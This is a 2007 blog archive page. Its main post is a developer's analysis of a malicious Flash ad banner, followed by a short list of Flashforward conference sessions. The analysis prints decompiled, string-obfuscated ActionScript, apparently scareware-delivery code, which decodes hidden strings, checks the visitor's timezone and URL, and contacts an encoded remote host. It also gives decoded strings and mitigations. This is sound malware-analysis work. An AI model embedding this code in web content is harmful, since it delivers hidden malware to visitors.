Archive for category Flash

De-constructing Malicious Flash

Posted by Barrett Sonntag in Flash, Website Analysis on November 22, 2007

Last Friday I was approached by my boss to look into an advertisers banners due to reports of malware notifications when browsing our site. It sounded far fetched to think that Flash was executing malicious code on the client side browsers but I cracked open the SWF files with a de-compiler to take a look.

It was a mess, a little searching let me know that it was probably encrypted by Amayeta SWF Encrypt as seen from the review at Flash Valley. It turned out that my superiors had already confronted the client with the information that they suspected their ads of containing malware and the client replied with a fixed version that they had just handed over me to look at.

I wasn’t going to stop there though and I found the original files to see if they matched. File size of the originals was smaller so I threw them through the de-compiler again and lo there was human readable code. Why would the client send over fixed files that were obfuscated when the originals were not?

Here is the code that I found sitting in an unassuming movieclip with not content other than the single frame and actionscript.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122

_root.c1 = "47ED02";
_root.c2 = "46E91A247C";
_root.c3 = "7FF817257C8DF8";
_root.c4 = "50E70523";
_root.c5 = "7FD7153B7080E795EA776F";
_root.c6 = "48FC022723CCA3A8F36070509F2105CBA738D20F50A22FD09E2BB7495689293D5623312668";
_root.c7 = "11";
_root.c8 = "10";
_root.c9 = "10";
_root.c10 = "11";
_root.c11 = "10";
_root.c12 = "17";
_root.c13 = "48FC022723CCA3";
_root.c14 = "10";
_root.c15 = "0DB1";
_root.c16 = "10";
_root.c17 = "48FC022723CCA3A7E67676518C201D9BA138D20F50A263C7922FAD031B923C634721342266E62EB8CBA9707F3088182CC3";
_root.c18 = "14B8";
_root.c19 = "53ED17257A8BF8A5F66B774FCB73559FE6268157";
_root.c20 = "0F";
_root.c21 = "11BF446F29D3BCFAAF";
_root.c22 = "7FD7022D";
_root.c23 = "7FFD043B";
_root.c24 = "53FD14246D91";
_root.c25 = "7FD7102363";
_root.c26 = "7FD7103B6F";
_root.c27 = "7FD710347188";
_root.c28 = "53ED1833";
_root.c29 = "47ED0203708EE9B0F06B666C9C2317CAA0";
String.prototype.color = function (eslogan)
{
var _loc3 = eslogan;
var result = "";
var _loc1;
var n;
var _loc2;
_loc1 = 0;
(n = this.length);
while (_loc1 < n)
{
_loc2 = parseInt(this.slice(_loc1, _loc1 + 2), 16) ^ _loc3 >> 8 & 255;
if (_loc2 > 127)
{
_loc2 = _loc2 + 848;
} // end if
result = result + String.fromCharCode(_loc2);
_loc3 = (_loc3 * 52845 + 22719) % 16777215;
_loc1 = _loc1 + 2;
} // end while
trace(result);
return (result);
};
_root[_root.c26.color(14688422)] = function ()
{
var _loc1 = _root;
_loc1._visible = false;
_loc1.createEmptyMovieClip("emc", _loc1.getNextHighestDepth());
_loc1.emc.u = dt.getTime();
if (parseInt(_loc1.c10.color(14688422)))
{
_loc1.emc.loadVariables(_loc1.c17.color(14688422),_loc1.c1.color(14688422));
_loc1.i = setInterval(_loc1[_loc1.c27.color(14688422)], 100);
return;
} // end if
_loc1[_loc1.c27.color(14688422)]();
};
_root[_root.c27.color(14688422)] = function ()
{
var _loc1 = _root;
if (_loc1.emc.stats == _loc1.c2.color(14688422) || !parseInt(_loc1.c10.color(14688422)))
{
clearInterval(_loc1.i);
new LoadVars()[_loc1.c28.color(14688422)](_loc1.c6.color(14688422),_loc1.c3.color(14688422), _loc1.c4.color(14688422));
so = SharedObject.getLocal(_loc1.c19.color(14688422),_loc1.c20.color(14688422));
so.data.uzhe = _loc1.uzhe = 1;
if (_loc1.emc.exp)
{
dt = new Date();
cr = dt.getTime();
so.data.expires = cr + _loc1.emc.exp * 24 * 60 * 60 * 1000;
} // end if
so.flush();
return;
} // end if
if (_loc1.emc.stats || --_loc1.lim == 0)
{
_loc1._visible = !(_loc1.uzhe && parseInt(_loc1.c9.color(14688422)));
clearInterval(_loc1.i);
} // end if
};
if (r == undefined)
{
r = 1;
_root.uzhe = 0;
_root.lim = parseInt(_root.c18.color(14688422));
_root[_root.c22.color(14688422)] = -new Date()[_root.c29.color(14688422)]() / 60;
if (parseInt(_root.c18.color(14688422)) && (!parseInt(_root.c7.color(14688422)) || _root[_root.c23.color(14688422)][_root.c24.color(14688422)](parseInt(_root.c11.color(14688422)), parseInt(_root.c12.color(14688422))) == _root.c13.color(14688422)) && (!parseInt(_root.c14.color(14688422)) || !(_root[_root.c22.color(14688422)] >= parseInt(_root.c15.color(14688422)) && _root[_root.c22.color(14688422)] <= parseInt(_root.c16.color(14688422)))))
{
dt = new Date();
cr = dt.getTime();
so = SharedObject.getLocal(_root.c19.color(14688422), _root.c20.color(14688422));
_root.uzhe = so.data.uzhe;
_root._visible = !(_root.uzhe && parseInt(_root.c9.color(14688422)));
if (parseInt(_root.c8.color(14688422)) > 1)
{
if (!so.data.expires)
{
so.data.expires = cr;
} // end if
++so.data.view;
} // end if
if (cr > so.data.expires || so.data.view == parseInt(_root.c8.color(14688422)))
{
so.data.expires = cr + parseInt(_root.c21.color(14688422));
so.flush();
_root[_root.c26.color(14688422)]();
} // end if
so.flush();
} // end if
} // end if
 
false;

Wow, it was like nothing I had ever seen before. I immediately stuck a trace at the end of the new String prototype for result to see just what types of information it was returning.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

__flv
__fchk
40
__tz
getTimezoneOffset
40
1
7
0
_url
substr
http://
__flv
__fchk

The last two lines __flv and __fchk just kept repeating as the SWF played on. I turned to the search engines and started pasting parts of this code in to find someone else that had run into this. I turned up a txt file from the site Mike on Ads – Errorsafe. He even put together an example of what this type of code can do if you look at the comments of that post or just visit it directly at http://mikeonads.com/errorsafe_test.html (just don’t click Yes when it prompts you to install stuff). As Mike pointed out this is circumvented with new security features in the Flash 9 player and setting AllowScriptAccess false in the HTML embed / object code.

I wanted to document my experience with this mainly to give another source of reference because Mike on Ads was the only reference to this code I could find and wasn’t able to find anyone who could explain just what this code wants to do with the users browser.

2 Comments

Flashforward Roundup

Posted by Barrett Sonntag in Flash on September 23, 2007

Day One

Adobe Keynote (unofficial video)
Kevin Lynch, Adobe

ActionScript 3 for Designers
Rich Shupe, FMA

On the Road with Adobe AIR
Mike Chambers, Adobe

The Secret to Project Management for the Creative Studio
Daniel Schutzsmith, GraphicDefine

Branding via Social Media for the Interactive Artist and Small Agency (will be removed 09/28/07!)
Giovanni Gallucci

OOP for the Noob – What’s in the Box?
Peter Elst, MindStudio

Rediscovering Fun!
Aral Balkan

Flash Workflows in Creative Suite 3
Colin Smith, PhotoshopCAFE.com

Video Game Opportunities with Flash
John Say, Say Design, Inc.

Creating and Selling Your Mobile Flash Content
Bill Perry, Adobe Systems

Building and Architecting a Flex Application: A Case Study
Chafic Kazoun, Atellis

Day Two

Breakfast Session: Flash Output with QuarkXPress 7 and Quark Interactive Designer!
Matthias Guenther, Quark

Tame Your Game with CS3 and ActionScript 3
Jay Laird, Metaversal Studios

Stylizing Flex Applications
Joey Lott, The Morphic Group

Animation Tips and Tricks
Chris Georgenes, Mudbubble

AIR, Finetune Desktop, and the Circle of Engagement
Tony MacDonell, Teknision

Designers vs. Developers: How To Avoid Fights on the Playground
Marc Leuchner, Almighty
Matt Wright, ROKKAN

Real World Flash Design Recipes
Colin Smith, PhotoshopCAFE.com

The Art and Zen of Mobile Games Using Flash (no content yet)
Scott Janousek, Hooken Mobile

Advergaming: From Pitch to Production with Flash CS3
Samuel Rivello, Neopets, Inc., an MTVN Company

Day Three

Keynote: The Aesthetics of Computation
John Maeda, MIT Media Lab

AS3 Particle Effects – Now 1000% Extra FREE!
Seb Lee-Delisle, Plug-in Media

Papervision3D
Carlos Ulloa, Papervision3D

BitmapData and 3D Image Manipulation in AS3
Paul Ortchanian, Goodby Silverstein & Partners

AIR Outside of the Box
Keith Peters, BIT-101

Flash and Search Engine Optimization (will be removed 09/28/07!)
Giovanni Gallucci

Flex and AJAX
David Gassner, Bardo Technical Services

If you have any information about any of the other sessions please let me know!

3 Comments